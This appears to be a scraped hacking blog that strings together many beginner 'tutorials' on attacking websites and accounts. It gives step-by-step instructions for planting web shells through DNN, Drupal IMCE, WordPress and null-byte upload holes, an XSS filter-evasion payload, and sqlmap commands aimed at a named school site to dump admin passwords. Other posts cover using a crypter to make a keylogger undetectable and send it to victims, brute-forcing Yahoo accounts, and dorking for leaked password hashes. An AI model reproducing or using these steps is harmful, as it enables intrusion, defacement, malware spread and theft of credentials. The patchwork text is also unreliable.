Simply put, cross site scripting involves the
injection of malicious code into a website. It
is the most common method of attack at the
moment, as most large sites will contain at
least one XSS vulnerability. However, there is
more than one type of XSS. The most
commonly found isreferred to as "non
persistent" XSS.
None Persistent XSS
Non persistent as the title suggests means
that the injectedscript isn't permanent and
just appears for the short time the user is
viewing the page. The best example of this is
a basic coded search engine for a site. Say for
example, the site search script is in this
format:
Site.com/search.php?search=text here
Once something has been searched for, the
script may display on the page something
along the lines of:
"Results for text here"
Simply echoing your search string straight
onto the page without performing any
validation checks. What if we were to alter
the search string to display html of
JavaScript? For example:
Site.com/search.php?search=XSS
Site.com/search.php?search=alert("XSS";
If no sanitation checks are being performed
by the search script, this will just be echoed
straight onto the page, therefore displaying
an alert or red text. If there was no limit to
the size, this could be used to display
anything you want.
However, since the attacker can only display
code on their own pages, this isn't much of a
threat to other users. Although if the string
was turned into Hex the search string may be
slightly more hidden and with a little
deception could be used to trick users into
thinking the link is legitimate.
Next there's persistent XSS
Persistent XSS
Again as the name suggests, this is the type
of XSS attack the attacker would want to get.
Persistent attacks are injected permanently
into the code of the site, so anyone who
views the site will be able to see permanently.
In order for these to work, the code has to
be made to store itself on the sites server
somehow, which can be hard to find.
An embarrassing example of this was an XSS
vulnerability discovered on this site by one of
our users (fixed now, obviously) affecting the
page blog.php. The register process wasn't
sanitized at all, so all a user had to do was
simply put redirection code. This was an
obvious vulnerability which should have been
spotted from the beginning, but just like XSS
on other sites it was missed. If not fixed, this
vulnerability would effect index.php as well
as the forums and anywhere where the code
was displayed on the site. A good place to
look out for this vulnerability is basic forum
scripts that site owners have made
themselves or found off sites designed to
help novices.
With both of these attacks, it is also possible
to run malicious code from another site
again making the possibilities of attack
endless. Javascript has a lot of features the
are not well know, such as changing the
images on sites from images[number].src
and anyone who uses myspace will know the
CSS can be used to remove or replace certain
sections of a site based on name.If you have
a permanently vulnerable site, injecting code
as simple as the one below will allow you to
run XSS off another site:
Getting Past Basic Protection
So what if a site owner knows about XSS, but
has provided some but very little protection
against it? Well, this is where CharCode
comes in. Char code is basically just a simple
form of character encoding that can encode
blocked characters so they get past the
protection but still get displayed normally on
thepage. Here is a very common onethat will
pop up alerts saying"XSS" if it is vulnerable:
';alert(String.fromCharCode(88,83,83))//';
alert(String.fromCharCode(88,83,83))//"; alert
(String.fromCharCode(88,83,83))//"; alert
(String.fromCharCode(88,83,83))//-->">'>
alert(String.fromCharCode(88,83,83))
This is a very useful XSS to know, as it
provides more than one type of attack at
once. If you get only one or two alerts, you
know that only one of two of them work, so
you need to try to eliminate some of them to
text which one is affecting the site. The
CharCode for "X" is 88 and"S" is 83. As you
can see, each provides a slight variation to try
to beat character blocking.
XSS could also be hidden in a none existent
image. This code below would run malicious
JavaScript disguised as an image:
What if quotes are blocked? No problem, just
inject the site like so:
The " will be interpreted in html as a " so the
code will run fine. The next one below is very
likely to work if you find a site is vulnerable.
Sunday 25 May 2014
Hackers use this google dorks and hack site automatically using shells
Hackers often use dis shell and hack sites using the online hack mechanism powered by google Use one of the following google dork to find the shell: intitle:index of/sh3llZ "Index of /sh3llZ" "/sh3llZ/uploadshell/ uploadshell.php" This will show the list of sites that has a sh3llZ folder. Probably, there will be link to c99 shell. If you click the link, it will land you in a shell page. Using that shell, you can upload your own shells or deface the sites. More Shells : http://sqladminportal.com /sh3llz/ http://phpadmin.org/sh3llz/ http://donate-for-charity.com/sh3llz/ http://php-admin.org/sh3llz/ http://smf- forum.org/sh3llz/ http://netdesigns.org /sh3llZ http://www.admin-portal.com /sh3llZ/ http://www.sexymodelforum.net /sh3llZ/ http://active-layout.org/sh3llZ http:// blog.dark-action.net/sh3llZ/ http://blog.brainshots-blog.com/sh3llZ/ http://activedesigns.org/sh3llZ/ http://john.charity-zone.com/sh3llZ/ http://donate-for-charity.net/sh3llZ/ http://balcesishop.com/sh3llZ/ http://to- charity.com/sh3llZ/ http://smf-forum.org /sh3llZ/ http://darkactioncomics.org /sh3llZ/
100% FUD Crypters for Keylogger and RATS
100% FUD Crypters for Keyloggers and RATs
So now i will teach u guys how to make ur
keyloggers and rats
Undetectable by antivirus so lets just begin
What are Crypters and what is FUD???
Well, I won't extend this topic over here, as I
will explained all things about crypters in my
articles #jxt chillax, Put Ya Mind 4 Groud# #l0l
Ok letx Go :- Steps.
How to use FUD crypter???
i have tried this Fud crypter and found it
working perfectly and i hope
it will work well for u as well
1.Download [= http://www.ziddu.com/
download/14444550/
XPROTECTCRYPTER_By_TRICKS4INDYA.rar.html]
FUD Crypter Software Here to bypass
antivirus.
2. Run crypter on your computer to see:
3. Hit on Browse and select the Decay logger
server you have created (I WILL POST HOW TO
CREATE A SERVER AFTER ). Again, hit on
second Browse button and select the
msc2.exe stubfile from downloaded folder.
Select type of encryption like Xor, Rsa, etc. as
you want. Now, hit on Crypt and select the
path where you want to save the crypted FUD
server.
4. You will find the crypted FUD server
created at required destination. Now, bind
this crypted keylogger server with any .exe
file using Iexpress Binder software and send
it to your victim to get the required email
passwords from victim computer dpending
on What information u want to get. You
don't have to worry about victim antivirus as
the crypted server will not be detected by any
antivirus.
I have posted the scan results below:
Scan result before crypting:
Scan result after Crypting:
Note :s ince this crypter is public, it will remain
FUD for not more than 2-3 days. So, use this
crypter the earliest. The best way is to get the
best hacking software -Winspy Keylogger,
which is FUD (Fully UnDetectable). This is
personally recommended keylogger
How to deface a pbnl site member.index works on only sites with post.php trendingphp and unprotected topic.php
To redirect a pbnl site with post.php or
without protected topics.php, either to your
site or to your deface page. you need to do
the following...visit any pbnl site,login then
create a new post with anything. I mean put
anything in the content and the title,then
open that post you created look @the
address bar you will see something like this
" www.site.tk/forum /showtopic.php?id=any
number(e.g =31), write down that
number,then create a new post in the forum
again, IN THE TITLE OF THE NEW POST PUT THIS
BELOW CODES.
u can as wel change the URL to ur own site.
while in the content put this below codes
then to finally complete your hacking visit
this link :
www.site.tk/forum/post.php?
action=update&tid=id of your second post
which will be =32
NOTE:i told you to create a post first of all
with anythin which i said write down the id,
if the id of the first post you created is 31
then the id of the new one you created will
be 32. DOWNLOAD THE TOPIC.PHP Below 2
protect ur site. N0TE: The topic.php allows
only ur admins to create thread,add music,
upload,e.t.c. It also rejects shells to be
uploaded in avatars folders as pics.
FREE BEST HACKING SOFTWARES YOU NEED TO HAVE AS A HACKER
Best Free Hacking Software and Tools List
There are plenty of tools floating round the
internet which claims to be the most effective
in their fields. I have used severalhacking
toolsthat are designed for windows and
Linux operating system and have seen that
the Linux operating system tools are way
more powerful than the windows tools.
Keeping this factor in mind I believed to
compile my ownbest free hacking software.
Here is the list ofBest free Hacking Software:
NMAP | Best Free Hacking Tool
NMAP, by far is that the bestsecurity
scanningandhacking toolever created. This
software is superior in each list of chief
hacking software for 2 reasons. Firstly, its
easy use and second, its wide usage.
It provides a large vary of options like port
scanning, fingerprinting,os detection, ping,
scanning, alive hosts detection, etc. It’s an
amazing command line tool for advanced
users which might mix many commands
along to execute ones. Its the foremost
recommended tool for beginners and further
as advanced learners and security specialists.
SUPERSCAN
Powerful protocol port scanner, pinger,
resolver.If you wish an alternative for Nmap
on Windows with an honest interface, I
recommend you to check this out, it’s pretty
nice. It provides a cool scanning expertise
with heap of data displayed.
CAIN AND ABEL
My personal favorite for cracking of any kind.
Cain & Abel could be a recovery tool for
Microsoft operating Systems. It permits
simple recovery of variedsimple passwords
by sniffing the network, cracking encrypted
passwords, Brute-Force and cryptology
attacks, recording VoIP conversations,
revealinghidden boxes, uncovering cached
passwords and analyzing routing protocols.
The program doesn’t exploit any software
package vulnerabilities or bugs that might
not be mounted with very little effort.
JOHN THE RIPER
This is my personal favoritecracking
softwarethat has been within the
marketplace for over a decade and it’s
evolved into a strong tool, thanks to the
special effort of the open source
community.John the Ripper may be a quick
password cracker, presently offered for
several operating system. Its primary
purpose is to observe weak operating
system passwords.
NESSUS SECURITY SCANNER
This tool has been the simplest tool for each
network admins and hackers, thanks to its
wide implementation.The Nessus
vulnerability scanner is the world-leader in
active scanners,that includes high-
speeddiscovery, configuration auditing,
quality identification, sensitive information
discovery and vulnerability analysisof your
security infrastructure.
WIRESHARK
Wiresharkcould be a network protocol
analyzer, or sniffer, that helps you to capture
andinteractively browse the contents of
network frames. The goal of the project is to
form a commercial-quality analyzer for UNIX
and to relinquish Wireshark options that are
missing from closed-source sniffers. Works
nice on both UNIX system and Windows
(with a GUI), simple to use and might
reconstruct TCP/IP Streams!
LIVE BULK MAILER
Live bulk mailer has the flexibility to still
deface the spam filter of gmail, hotmail and
yahoo. Its an email flooding tool that permits
the hacker to send desired variety of bulk
mails to the victim inbox and flood it utterly.
This could be a difficult task and might place
you into problems therefore before attacking
via this tool don’t forget to use a proxy server
to cover your IP address.
WEBSITE DIGGER
Website digger may be atool that helps you
to Digg into an internet siteand gain data
concerning the host by applying whois
questionand conjointly banner grabbing
capability.
How to Hack Email Using Google
Hacking a Gmail,Yahoo, Hotmail emails using
Google
[Image: hacker.gif]
To get success remeber this rule of hash
technique TRY,Try and try Biggrin
HELLO GUYS
today i will show u how to hack gmail yahoo
etc accounts very easily.
I have seen the those people who want to
hack someones email accounts spend their
lots of time on searching but found
nothing.Most of noob hackers try to hack
someone with phishing attack but phishing
is also one of the most hideous technique on
Mail Hacking. But today i am going to show
you a very new method which is called hash
technique.
So lets just begin
1. open http://www.google.com
2. now paste this code in the search bar and
hit enter
(1) ext :s ql
(ii) intext :@ hotmail.com [change
@ hotmail.com to any mail provider e.g intext
:@ gmail.com]
(iii)
intext:e10adc3949ba59abbe56e057f20f883
e
3. Choose Among any of d three options Dork
above and search 4 it via Google Now click
on any of the displayed page
4. After clicking you will se these hashes
along with the emails
5. copy any hash code Eg
( 127359f404a2b735 de9ba1336c66f480)
and go to ONLINE MD5 HASH DECRYPTER and
paste the hash code and click descrypt hash
After 2-3 seconds it willgive u the password
if found.
Some emails wont work they hve changed
their passwords or the hash code result is
null
I hope that u will enjoy this tutorial thanks
and like us on facebook.
If the above site dont work try these sites
MD5ENCRYPTI0N
http://md5rainbow.com
http://md5online.org
Note
This is illegal and only for educational
purpose
HACKING WEBSITES USING DNN PORTAL HACKING
HACKING WEBSITES USING DNN PORTAL HACKING
Google Dorks
1- inurl:"/portals/0"
2- inurl:/tabid/36/
language/en-US/
Default.aspx
You can also modify this
google dork according to your
need & requirement
Here is the exploit
Providers/
HtmlEditorProviders/Fck/
fcklinkgallery.aspx
Step 1 :
http://www.google.com
Step 2:
Now enter this dork
:inurl:/tabid/36/language/
en-US/Default.aspx
this is a dork to find the Portal
Vulnerable sites, use it wisely.
Step 3:
you will find many sites,
Select the site which you are
comfortable with.
Step 4:
For example take this site.
http://www.abc.com/
Home/tabid/36/Lan...S/
Default.aspx
Step 5: Now replace
/Home/tabid/36/Language/
en-US/Default.aspx
with this
/Providers/
HtmlEditorProviders/Fck/
fcklinkgallery.aspx
Step 6: You will get a Link
Gallary page.So far so good!
Step 7: Dont do anything for
now,wait for the next step...
Step 8: Now replace the URL
in the address bar with a
Simple Script
javascript:__doPostBack
('ctlURL$cmdUpload',''
Step 9: You will Find the
Upload Option
Step 10:
Select Root
Step 11:
Upload your package Your
Shell c99,c100 , Images, etc
After running this JAVA
script, you will see the option
for Upload Selected File Now
select you page file which
you have & upload here.
Now Go to main page and
refresh. you have seen
hacked the website.
DONE..!!
HOW TO HACK A WEBSITE USING AN ANDROID PHONE
Hello Guys today we talk about how to hacked a website using your Androidphone. We know that in the world 70% website hacked by using SQL injection. For automate SQL injection We need tools or OS - back track, havij or Kali, and etc..But now you can attack on site using your android mobile phone and Tables and hack website. Only you need 3 things 1 - SQL Vulnerable site 2 - android mobile 3 - Droidsqli tool click HERE to download Droidsqli tool DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks. DroidSQLi supports the following injection techniques: *.Time based injection *.Blind injection *.Error based injection *.Normal injection It automatically selects the best technique to use and employs some simple filter evasion methods #THIS TUTORIAL IS FOR THOSE WHO ALREADY KNOW HW TO CARRY OUT A SQLI ATTACK WITH ANY AUTOMATE SQLI TOOLS.
droidsql.zip
HOW TO HACK A YAHOO ID USING BRUTE OR BRUTUS FORCe
TODAY I WILL SHOW YOU HOW TO HACK YAHOO IDS BY BRUTE FORCE ATTACK.. Step 1: Download Brutus Force by searching it on google then Extract it on desktop and lets start/ ok run it Step 2: To hack email in target bar write pop.mail.yahoo.com Step 3: Type : POP3 Step 4: Put connections to 60 and timeout to 60 Step 5: Make sure you check a ''Single User'' Step 6: Then when you check that to single user write in that bar you victims yahoo acc ID / explanation .. like hackerpilu@yahoo.com his ID will be hackerpilu.. write that Step 7: Password mod put on: ''Brute Force'' Step 8: Then click ''Range''(a new window will pop up) Step 9: Then make sure you put ''Min Length'' 6 and ''Max Length'' to 16 Step 10: Then put custom range .. or anything default as you want. Step 11: Click OK And for end click Start .. that's all .. now wait for the process to complete..ENJOY!! Note:for educational purpose only
HOW TO REDIRECT A VULN PBNL WEBSITE INDEX:PHP
This simple method can redirect d index.php of a PBNL WEB dat is using TRENDING MUSIC,TRENDING VIDEO, E.T.C LETS GET DOWN.... Firstly Register @ d site, then login and type in ur address bar www.sitename.com/music/ upload.php or www.sitename.com/movies/ upload.php. When it opens, write in the music title in the link write www.fileshare.website.tl/ delta.mp3 leave d image empty and put in the comment and click ADD, if d site is vuln. It will redirect d index.... NOTE THAT THE SITE MUST HAVE TRENDING MUSIC OR TRENDING "what you're adding"...
IMCE Dir Exploit for Hacking Drupal Websites
UsingIMCE directory exploitwe can upload our shells on websites which are made using DRUPAL platform and execute our shells and hence can easilyhack the websitesor simply say we can deface that website using thatloophole. Actually let me provide you more information about this Drupal FileBrowser bug. IMCE directory opens the file browser of the website from where you can upload images to your websites, so guy for uploading your shells you need to rename your shells like say c99.php to c99.png or r60.php to r60.png etc.. Now lets learn how to deface website or hack website using this bug: 1. First of all open the Google andthen type the below query in search box: inurl:"/imce?dir=" 2. Now search results will appear like below: 3. Now open the links like mentioned below: www.arcireal.com/imce?dir=imagecache/ dettaglio 4. Now a File browser will open which will allow you to upload and navigate though files: 5. Now upload the shell by clicking on upload button. 6. Access the shell by double clicking on that. 7. Rest things you already know.. Note: This is only for educational purposes. Any misuse is not the responsibility of HackingLoops orme.
HOW TO UNLOCK WINDOWS PASSWORD
Q) Where are windows password saved? A)
Windows first encrypts the password using
some algorith and then saves it to a Sam
file.This sam file is locked and no user
account including the administrator can use
this file.This file is located in windows/
system32/config. Q) What is the above link ?
A) The link given above is the download link
for “hirens boot cd “. It is a special type of
**live cd** bunched with popular and
useful windows password unlocker tools.
The link is to hirens boot cd 15.1, but you
can download any earlier version. The main
reason for choosing this cd is that it
contains number of useful softwares. There
are many other Live cds too, you can even
try them. Q) what is a **live cd**? A) Live cd
is a cd/dvd or any other portable media
containing bootable Operating system.
These media have the unique ability to run
operating system without altering the files
and operating system installed on the hard
disk of the pc. It generally places its files in
the Ram[random access memory ,volatile
memory],so when a pc is rebooted all it files
are deleted automatically. Q) How does this
cd helps us? A) Since this live cd doesnt use
the pre installed operating system ,we can
edit/ delete it files [even the locked ones ie
sam file].You can also use utilities present in
this cd to change the windows password.
Steps:- 1) Download the zip file from the
above link. 2) Extract it. 3) There will be a .iso
file .Burn that file to cd using nero/poweriso
or anyother software you have. 4) Boot
using this cd ie insert this cd in CD-Rom and
restart [Make sure that cd-rom has the
highest boot priority] 5) After booting ,It will
show a menu , Choose “Mini windows xp“.It
will take some time to launch. 6) After it is
finished ,You will be having a windows
classic style desktop. 7) Click on start>>Hiren
boot cd menu [HBCD menu] 8 ) It will open a
dialogue box,click on “Menu” >>click on
“password andkeys”, there you will be
having a list of softwares,click on
“”Password renew”". 9)Now click on select
target ,Browse to your windows ie
“c:windows” and press ok. 10)Click on
“Renew exisiting user password” and then
choose the Your user account . 11) Enter the
desired password and hit install. 12)You are
now done just restart Your pc and login
using your new password. Prevention : Set
the least boot priority for CD – ROM and set a
password at Bios setup . This way Bios wont
boot from the CD and the Operating system
will not load
SQL INJECTION |Website Deface | Usingtool |
What is SQL injection ? SQL stands for
Structured Query Language.SQL is used to
design the databses. The information is
stored in databses. SQL injection is the
vulnerability occuring in database layer of
application which allow attacker to see the
contents stored in database. This
vulnerabilty occures when the user's input is
not filtered or improperly filtered. The main
goal of attacker is use to access the
information stored in website's database. It
can be done manually, read more here. In
this tutorial, I am using to do the same thing
easily using a tool. Read the disclaimer first
before proceeding. I remind you again that
its only for educational purposes.
Requirement: Download the tool from here.
Its SqliHelperV.2.1. Steps of attack :-
Vulnerable Website > Database > Tables >
Columns > Data Search for any vulnerable
website using Google Dorks. I found this
website http://www.shelter.org/ org/
news.php?id=5. I came to know its
vulnerable because when I attached a single
quote at the end, it didn't filter it and
returned me with an error. http://
www.shelter.org/ org/news.php?id=5' Step
1. Run the tool and there is no need of any
installation. Input the vulnerable URL and
click on 'Inject' Step 2 : After processing is
done. Click on "Get Database".It would then
show the databases Step 3: Select any
database other than "Information_schema"
and Click on "Get tables". It would start
fetching all tables. Have some patience. In
most of the cases there is a table like admin
or login or users etc. Step 4: Select any Table
and click on "Get Columns". Step 5: Select the
column and click on "Dump Now" . A new
pop up window would open showing you
the data stored in it. Try the same thing
manual ly to pract ice your ski l ls So You
came to know that how deadly it could be to
allow users to send their input without any
filteration/validation. So never be lazy at
programming and use possible filteration
mechanisms
NETWORK HACKING
Network Hacking is generally means
gathering information about domain by
using tools like Telnet, NslookUp, Ping,
Tracert, Netstat, etc.
It also includes OS Fingerprinting, Port
Scaning and Port Surfing using various tools.
Ping :p ing is part of ICMP (Internet Control
Message Protocol) which is used to
troubleshoot TCP/IP networks. So, Ping is
basically a command that allows you to check
whether the host is alive or not.
To ping a particular host the syntax is (at
command prompt)--
c:/>ping hostname.com
example:- c:/>ping www.google.com
Various attributes used with 'Ping' command
and their usage can be viewed by just
typingc:/>pingat the command prompt.
Netstat :-It displays protocolstatistics and
current TCP/IP network connections. i.e. local
address, remote address, port number, etc.
It's syntax is (at command prompt)--
c:/>netstat -n
Telnet :-Telnet is a program which runs on
TCP/IP. Using it we can connect to the remote
computer on particular port. When
connected it grabs the daemon running on
that port.
The basic syntax of Telnet is (at command
prompt)--
c:/>telnet hostname.com
By default telnet connects to port 23 of
remote computer.
So, the complete syntax is-
c:/>telnet www.hostname.comport
example:- c:/>telnet www.yahoo.com 21 or
c:/>telnet 192.168.0.5 21
Tracert :-It is used to trace out the route
taken by the certain information i.e. data
packets from source to destination.
It's syntax is (at command prompt)--
c:/>tracert www.hostname.comexample:- c:/
>tracert www.site.com
Here "* * * Request timed out." indicates that
firewall installed on that system block the
request and hence we can't obtain it's IP
address.
various attributes used with tracert
command and their usage can be viewed by
just typingc:/>tracertat the command
prompt.
The information obtained by using tracert
command can be further used to find out
exact operating system running on target
system
phpFox (ajax.php) XSS Vulnerability
PhpFox is a Php Script For Making Social
Networking website, Similiar to Facebook.
3.1 and some other versions of PhpFox are
vulnerable For XSS.
Google Dork :
"intext:© · English (US) Powered By phpFox
Version 3.0.1."
"inurl:/static/ajax.php?core"
Open any website for search results with
text :© · English (US) Powered By phpFox
Version 3.0.1
or url xyz.com/static /ajax.php?core
now You'll Get something Like This URL give
below
http://www.ursite.com/static /
ajax.php?core[ajax]=true&core
[call]=core.message&height=150&width=300
&message=
some message
here&core
[security_token]=99d754d2b583565369e
194e30eaabcbc
Now Chnage the Text &Message= blah blah
blah.... (you have to replace the red text with
your html Tags)
for example
http://www.ursite.com/static /
ajax.php?core[ajax]=true&core
[call]=core.message&height=150&width=300
&message=
www.ursite.com
XSS
www.ursite.com
&core
[security_token]=99d754d2b583565369e
194e30eaabcbc
You can use multiple html Tags, and scripts
here For details Check This Post
Live examples :
http://onlinesocial.in/static /ajax.php?core
[ajax]=true&core
[call]=core.message&height=150&width=300
&message=
XSS
www.ursite.com
&core
[security_token]=99d754d2b583565369e
194e30eaabcbc
http://www.marshable.net /static/ajax.php?
core[ajax]=true&core
[call]=core.message&core
[security_token]=860eb6a699d5d9f375b5e8
cf0021c094&height=150&message=
XSS
www.ursite.com
XSS
www.ursite.com
&core
[security_token]=99d754d2b583565369e
194e30eaabcbc
http://www.marshable.net /static/ajax.php?
core[ajax]=true&core
[call]=core.message&core
[security_token]=860eb6a699d5d9f375b5e8
cf0021c094&height=150&message=XSS
www.ursite.com
CMS SITE VULN TUT::::::
Go to google search dis Dork : "inurl:wp-content/themes/GeoPlaces/"
DATE: 2/6/2013
To upload shell
Site.com/wp-content/themes/GeoPlaces /monetize/
upload/
To Find ur Shell
Site.com/wp-content/uploads/2013/08
Replace the
Date when u upload
SQL STEP BY STEP TUTORIAL
Today we will learn how to operate the "best
SQL injection exploiting tool" i.e SQLMAP
its a python tool , and it is preloaded in
almost every Back Track versionfirst of allwe
need a vulnerable target!here it is http://
www.alliedschools.edu.pk/main_news.php ?
news_id=52
ok first step is to fatch the databases
command will be like this one python ./
sqlmap.py -u http://
www.alliedschools.edu.pk/main_news.php ?
news_id=52 --dbshere:- -u is stand for which
is vulnerable to SQL injection and
--dbs is used for fatching total databases in
website
ok after completing the process of fataching
the databases it will something like that
available databases(8)
*.informtion_schema
*.alliedschools_web
now we are going to expoit database
alliedschools_web and fatch the tables
present in it XDok command will change a
little bit :p ython ./sqlmap.py -u http://
www.alliedschools.edu.pk/main_news. php?
news_id=52 -Dalliedschools_web --
tableshere :- -D and then name of the
database from which we want to fetch tables
and --tables is for fatching total table present
in the database after processing we will get
the tables present in database
"alliedschools_web"
after processing we will get something like
that Database: alliedschools_campus [18
Tables ] admin campus ...... ......
now we are going to fatch the cloumns from
table admin of database
alliedschools_campus command is :- python ./
sqlmap.py -u http://
www.alliedschools.edu.pk/main_news. php?
news_id=52 -Dalliedschools_campus -T admin
--columns
now we will get something like this
Database: alliedschools_campus Table : admin
[12 columns ] admin_password
admin_username admin_email ...... ......
This is the last command to get the admin
username and password command is
python ./sqlmap.py -u http://
www.alliedschools.edu.pk/main_news. php?
news_id=52 -Dalliedschools_campus -T admin
-Cadmin_password, admin_username --dump
and after finishing process we will get
something like that Database:
alliedschools_campus Table : admin [6
entries] admin_password admin_username
$erver admin ...... ......
Now You Have admin Password of website,
Find admin panel and hun hun (DO
WHATEVER U LYK AS 4 ME I DID WHATEVA I LYK
WITH AFRICANEX.COM AND SYMN.NET AND
MUCH M0RE WITH DIZ TUT0RIAL)...xD
The Null Byte Hack : Extreme HacK for sites which have uploading avtar and picture Facility
Many web forums have mushroomed on
internet and they are setup in a jiffy,so they
wont pay much attention to security . An
older exploit I m discussing here is Null Byte
exploit.Almost all forums include a picture
and avatar uploading system where you can
upload your user signatures and avatars.At
first look it looks like a normal uploading
system,but its a way to upload our own files
into forum,or to get into admin area and
literally “OWN” the forum. However as this
hack is outdated as of now,most have
deployed some form of input sanitation to
prevent such an attack.
Nevertheless,thousands of vulnerable forums
do exists even now with even some bigger
names crossed here.
How to do exploit it?
In order to exploit this vulnerability,you must
input “% 00” (with or without space as the
case arises).Now a lot of you are probably
asking what the heck it is? Ah well..its the
encrypted version of NULL .Its just like the
same as we used to exploit the null session
in Windows systems.
Now,whenever you will upload a file,you will
be asked to specify the directory where the
file is located.Now as each file has a
particular extension,to signify thekind of file
it is.Now what if we can input the “% 00” at
the end of the file ?
The way most forums keep bad files in
control and out of forum is by restricting
certain extensions such as .exe . php etc.But
if we can modify the file and trick the server
into thinking thatits something else the..
For Example:
C:webrootc99.php% 00.jpg
Now when we do this,The operating system
will read the file to be uploaded as a PHP
file,but the forum server will readit as a .jpg
(image) file.And when this happens,you will
exploit it to get and upload your files on
server,and if you are a bit creative,can access
the admin area too.
IF YOU LIKE MY POST REPLY!
EASY WAY TO HACK a SITE USING GOOGLE dORKS
Go to ur adress bar and visit dis link to get a high number of dorks to use for this tutorial
http://pastebin.com/uTS5BKaB
vlunarable site maybe site.com/index.php?p
age=home
To chek www.targetsite.com/index.php?p
age= www.google.com
go to any host creat and account upload shell @ public_html then make sure tz in .txt(?) add sure B
http://www..com /v2/index.php?page=http://
www.tatata.hostingsite.com/c99.txt ?
then u can access ur shell
Intrusion DetectionSystem (IDS)
An intrusion detection system (IDS) is
software and/or hardwarebased system that
monitors network traffic and monitors for
suspicious activity and alerts the system or
network administrator. In some cases the IDS
may also respond to anomalous or malicious
traffic by taking action such as blocking the
user or source IP address from accessing the
network.
Typical locations for an intrusion detection
system is as shown in the following figure -
Following are the types of intrusion detection
systems :-
1) Host-Based Intrusion Detection System
(HIDS) :-Host-based intrusion detection
systems or HIDS are installed as agents on a
host. These intrusion detection systems can
look into system and application log files to
detect any intruder activity.
2) Network-Based Intrusion Detection System
(NIDS) :-These IDSs detect attacks by
capturing and analyzing network packets.
Listening on a network segment or switch,
one network-based IDS can monitor the
network traffic affecting multiple hosts that
are connected to the network segment,
thereby protecting those hosts. Network-
based IDSs often consist of a set of single-
purpose sensors or hosts placed at various
points in a network. These units monitor
network traffic, performing local analysis
ofthat traffic and reporting attacks to a
central management console.
Some important topics comes under
intrusion detection are as follows :-
1) Signatures -Signature is the pattern that
you look for inside a data packet. A signature
is used todetect one or multiple types of
attacks. For example, the presenceof “scripts/
iisadmin” in a packet going to your web
server may indicate an intruder activity.
Signatures may be present in different parts
of a data packet depending upon the nature
of theattack.
2) Alerts -Alerts are any sort of user
notification of an intruder activity. When an
IDS detects an intruder, it has to inform
security administrator about this using alerts.
Alerts may be in the form ofpop-up windows,
logging to a console, sending e-mail and so
on.Alerts are also stored in log files or
databases where they can be viewed later on
by security experts.
3) Logs -The log messages are usually saved
in file.Log messages can be saved either in
text or binary format.
4) False Alarms -False alarms are alerts
generated due to an indication that is not an
intruder activity. For example, misconfigured
internal hosts may sometimes broadcast
messages that trigger a rule resulting in
generation of a false alert. Some routers, like
Linksys home routers,generate lots of UPnP
related alerts. To avoid false alarms, you have
to modify and tune different default rules. In
some cases you may need to disable some of
the rules to avoid false alarms.
5) Sensor -The machine on whichan
intrusion detection system is running is also
called the sensor in the literature because it
is used to “sense” the network.
Snort :s nort is a very flexible network
intrusion detection system that has a large
set of pre-configured rules. Snort also allows
you to write your own rule set. There are
several mailing lists on the internet where
people share new snort rules that can
counter the latest attacks.
Snort is a modern security application that
can perform the following three functions :
* It can serve as a packet sniffer.
* It can work as a packet logger.
* It can work as a Network-Based Intrusion
Zed Attack Proxy (ZAP) – Integrated Penetration Testing Tool
The Zed Attack Proxy (ZAP) is an easy to use
integrated penetration testing tool for
finding vulnerabilities in web applications.
It is designed to be used by people with a
wide range of security experience and as
such is ideal for developers and functional
testers who are new to penetration testing.
ZAP provides automated scanners as well as
a set of tools that allow you to find security
vulnerabilities manually.
Features:
*.Intercepting Proxy
*.Automated scanner
*.Passive scanner
*.Brute Force scanner
*.Spider
*.Fuzzer
*.Port scanner
*.Dynamic SSL certificates
*.API
*.Beanshell integration
Characteristics:
*.Easy to install (just requires java 1.6)
*.Ease of use a priority
*.Comprehensive help pages
*.Fully internationalized
*.Under active development
*.Open source
*.Free (no paid for ‘Pro’ version)
*.Cross platform
*.Involvement actively encouraged
Download: ZAP 1.3.1 || zap-api-v2-4.jar from google
6 WAYS TO HACK ANd DEFACE A WEBSITE ONLINE
Hello friends , today i will explain all the
methods that are being used to hack a
website or websites database. This is the
first part of the hacking websitestutorial
where i will explain in brief all methods for
hacking or defacing websites. Today I will
give you the overview and in later tutorials
we will discuss them one by one with
practical examples. So guys get ready for first
part of Hacking websites class.... Don't worry i
will also tell you how to protect your
websites from these attacks and other
methods like hardening of SQL and
hardening of web servers and key
knowledge about CHMOD rights that what
thing should be give what rights...
Note : This post is only for Educational
Purpose only.
What are basic things you should know
before website hacking?
First of all everything is optional as i will start
from very scratch. But you need atleast basic
knowledge of following things..
1. Basics of HTML, SQL, PHP.
2. Basic knowledge of Javascript.
3. Basic knowledge of servers that how
servers work.
4. And most important expertize in removing
traces otherwise u have to suffer
consequences.
Now First two things you can learn from a
very famous websitefor basics of Website
design withbasics of HTML,SQL,PHP and
javascript.
http://www.w3schools.com/
And for the fourth point that you should be
expert in removing traces. I will explain this
in my future articles. So keep reading.. or
simply subscribe my posts..
As we know traces are very important. Please
don't ignore them otherwise you can be in
big trouble for simply doing nothing. so
please take care of this step.
METHODS OF HACKING WEBSITE:
1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY.
1. SQL INJECTION
First of all what is SQL injection? SQL injection
is a type of security exploit or loophole in
which a attacker "injects" SQL code through a
web form or manipulate the URL's based on
SQL parameters. It exploits web applications
that use client supplied SQL queries.
The primary form of SQL injectionconsists of
direct insertion of code into user-input
variables that are concatenated with SQL
commands and executed. A less direct attack
injects malicious code into strings that are
destined for storage in a table or as
metadata. When the stored strings are
subsequently concatenated into a dynamic
SQL command, the malicious code is
executed.
2. CROSS SITE SCRIPTINGCross site scripting
(XSS) occurs when a user inputs malicious
data into a website, which causes the
application to do something it wasn’t
intended to do. XSS attacks are very popular
and some of the biggest websites have been
affected by them including the FBI, CNN,
Ebay,Apple, Microsft, and AOL.
Some website features commonly vulnerable
to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields
Cross-site scripting holes are web application
vulnerabilities that allow attackers to bypass
PASSWORD CRACKING
Password cracking is the process of
recovering secret passwords from data that
has been stored in or transmitted by a
computer system. A common approach is to
repeatedly try guesses for the password.
N0TE:
THE FOLLOWING INF0 ARE WRITTEN AND
C0MP0SED,EXPLAIN BY ME, IF U HAVE ANY
PROBLEM OR ANY FURTHER INF0 OR QUESTI0N
DROP IT HERE #THANKS.
Most passwords can be cracked by using
following techniques :
1) Hashing :-Here we will refer to the one
way function (which may be either an
encryption function or cryptographic hash)
